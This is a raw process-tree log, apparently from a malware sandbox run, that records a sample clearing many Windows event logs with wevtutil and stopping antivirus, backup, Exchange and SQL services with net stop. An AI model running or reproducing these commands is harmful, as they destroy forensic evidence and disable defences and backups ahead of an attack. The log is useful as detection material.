C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"4⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"4⤵PID:1480
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"4⤵PID:4400
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"4⤵PID:4020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"4⤵PID:2384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"4⤵PID:2684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"4⤵PID:672
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"4⤵
- Clears Windows event logs
PID:4360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"4⤵PID:3764
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"4⤵PID:4312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"4⤵PID:2332
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"4⤵PID:964
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"4⤵PID:1016
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"4⤵PID:2256
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"4⤵PID:2104
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Diagnostic"4⤵PID:4464
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Operational"4⤵PID:4972
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"4⤵PID:4652
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"4⤵PID:1132
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"4⤵PID:4568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"4⤵PID:5064
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"4⤵PID:5076
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"4⤵PID:5108
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"4⤵PID:1320
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"4⤵PID:392
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"4⤵PID:3192
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"4⤵PID:1272
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Informational"4⤵PID:4288
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Operational"4⤵PID:4636
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Performance"4⤵PID:5084
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"4⤵PID:2772
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audit/Analytic"4⤵PID:800
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"4⤵PID:4264
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"4⤵PID:3932
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"4⤵PID:416
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"4⤵PID:4528
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"4⤵PID:4768
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"4⤵PID:972
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"4⤵
- Clears Windows event logs
PID:3720
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"4⤵PID:1436
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"4⤵
- Clears Windows event logs
PID:4428
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Backup"4⤵PID:932
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"4⤵PID:5052
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"4⤵PID:4000
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"4⤵PID:3164
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"4⤵PID:940
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"4⤵PID:4836
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"4⤵PID:3968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"4⤵PID:5004
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"4⤵PID:2080
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"4⤵PID:1608
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"4⤵PID:2116
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"4⤵PID:3152
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"4⤵PID:1104
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"4⤵PID:3700
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"4⤵PID:2300
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"4⤵
- Clears Windows event logs
PID:5020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"4⤵PID:3240
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"4⤵PID:4892
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"4⤵PID:1908
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"4⤵
- Clears Windows event logs
PID:280
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"4⤵PID:388
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"4⤵PID:2156
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"4⤵
- Clears Windows event logs
PID:1224
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"4⤵PID:1036
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CDROM/Operational"4⤵PID:1172
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Analytic"4⤵PID:3248
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"4⤵PID:4220
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"4⤵PID:984
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Call"4⤵
- Clears Windows event logs
PID:4512
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"4⤵PID:632
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"4⤵
- Clears Windows event logs
PID:4920
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"4⤵PID:1304
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"4⤵PID:1488
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"4⤵PID:260
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"4⤵PID:2100
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"4⤵PID:4016
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"4⤵PID:3392
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"4⤵PID:4172
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"4⤵PID:3148
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"4⤵PID:580
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Analytic"4⤵PID:4260
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Operational"4⤵
- Clears Windows event logs
PID:4872
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"4⤵PID:4276
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"4⤵
- Clears Windows event logs
PID:1068
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"4⤵PID:2632
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"4⤵PID:1464
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"4⤵PID:2984
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"4⤵PID:3324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"4⤵
- Clears Windows event logs
PID:3440
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"4⤵PID:1244
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"4⤵PID:4952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"4⤵PID:4348
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"4⤵PID:3244
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"4⤵PID:636
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"4⤵PID:1932
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"4⤵PID:3444
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"4⤵PID:4352
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"4⤵PID:2184
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"4⤵PID:4436
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"4⤵PID:4212
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"4⤵PID:1472
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"4⤵PID:3380
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"4⤵
- Clears Windows event logs
PID:4984
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"4⤵PID:340
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"4⤵PID:4256
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"4⤵PID:4992
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"4⤵PID:3084
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"4⤵
- Clears Windows event logs
PID:4988
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"4⤵PID:3640
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"4⤵PID:660
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"4⤵PID:3484
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"4⤵PID:4404
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"4⤵PID:2228
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"4⤵PID:3772
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"4⤵PID:2108
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"4⤵PID:1032
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"4⤵PID:1740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"4⤵PID:2708
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"4⤵PID:4556
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"4⤵PID:1776
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"4⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"4⤵PID:2392
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"4⤵PID:1372
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"4⤵PID:4400
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"4⤵PID:4020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Admin"4⤵PID:4228
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Analytic"4⤵PID:2684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Debug"4⤵PID:672
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Operational"4⤵PID:4360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"4⤵PID:3764
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"4⤵PID:3784
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"4⤵PID:364
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Logging"4⤵PID:4284
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXP/Analytic"4⤵PID:964
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"4⤵PID:1016
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"4⤵PID:3788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"4⤵PID:4584
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"4⤵PID:4048
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"4⤵PID:3792
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"4⤵PID:692
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"4⤵PID:1648
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"4⤵PID:576
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"4⤵PID:4004
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"4⤵PID:1368
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"4⤵
- Clears Windows event logs
PID:592
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"4⤵PID:5108
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"4⤵PID:4268
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"4⤵PID:1592
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"4⤵PID:4200
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"4⤵PID:1484
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"4⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"4⤵PID:4456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"4⤵
- Clears Windows event logs
PID:904
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"4⤵PID:5032
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"4⤵PID:800
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"4⤵PID:3124
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"4⤵PID:5044
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"4⤵PID:416
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"4⤵PID:1268
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"4⤵PID:4804
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"4⤵PID:3720
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"4⤵PID:2568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"4⤵
- Clears Windows event logs
PID:4184
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"4⤵
- Clears Windows event logs
PID:4488
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"4⤵PID:4180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"4⤵PID:4176
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"4⤵PID:4800
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"4⤵
- Clears Windows event logs
PID:5000
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"4⤵PID:4740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"4⤵PID:5008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"4⤵PID:3968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"4⤵PID:2452
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"4⤵PID:2304
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"4⤵PID:2136
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"4⤵PID:1980
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"4⤵PID:5080
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"4⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"4⤵PID:4848
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"4⤵PID:5040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"4⤵PID:1380
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"4⤵
- Clears Windows event logs
PID:4904
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"4⤵PID:3240
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"4⤵PID:4892
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"4⤵PID:1184
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"4⤵PID:3664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfemms"3⤵PID:3708
-
C:\Windows\system32\net.exenet stop "mfemms"4⤵PID:3484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfemms"5⤵PID:5072
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfevtp"3⤵PID:2696
-
C:\Windows\system32\net.exenet stop "mfevtp"4⤵PID:4384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfevtp"5⤵PID:4404
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MMS"3⤵PID:3836
-
C:\Windows\system32\net.exenet stop "MMS"4⤵PID:1372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MMS"5⤵PID:4552
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mozyprobackup"3⤵PID:2360
-
C:\Windows\system32\net.exenet stop "mozyprobackup"4⤵PID:1360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mozyprobackup"5⤵PID:2684
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer"3⤵PID:2384
-
C:\Windows\system32\net.exenet stop "MsDtsServer"4⤵PID:1252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer"5⤵PID:3520
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"3⤵PID:4652
-
C:\Windows\system32\net.exenet stop "MsDtsServer100"4⤵PID:2412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer100"5⤵PID:2568
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"3⤵PID:4568
-
C:\Windows\system32\net.exenet stop "MsDtsServer110"4⤵PID:1216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer110"5⤵PID:3060
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeES"3⤵PID:692
-
C:\Windows\system32\net.exenet stop "MSExchangeES"4⤵PID:4588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeES"5⤵PID:4200
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"3⤵PID:4268
-
C:\Windows\system32\net.exenet stop "MSExchangeIS"4⤵PID:1592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeIS"5⤵PID:5108
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"3⤵PID:1272
-
C:\Windows\system32\net.exenet stop "MSExchangeMGMT"4⤵PID:4636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMGMT"5⤵PID:1964
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"3⤵PID:904
-
C:\Windows\system32\net.exenet stop "MSExchangeMTA"4⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMTA"5⤵PID:4832
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"3⤵PID:416
-
C:\Windows\system32\net.exenet stop "MSExchangeSA"4⤵PID:4492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSA"5⤵PID:5084
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"3⤵PID:4760
-
C:\Windows\system32\net.exenet stop "MSExchangeSRS"4⤵PID:5080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSRS"5⤵PID:3720
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"3⤵PID:4176
-
C:\Windows\system32\net.exenet stop "MSOLAP$SQL_2008"4⤵PID:1072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SQL_2008"5⤵PID:972
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"3⤵PID:5040
-
C:\Windows\system32\net.exenet stop "MSOLAP$SYSTEM_BGC"4⤵PID:4160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"5⤵PID:4488
-
-
-
-
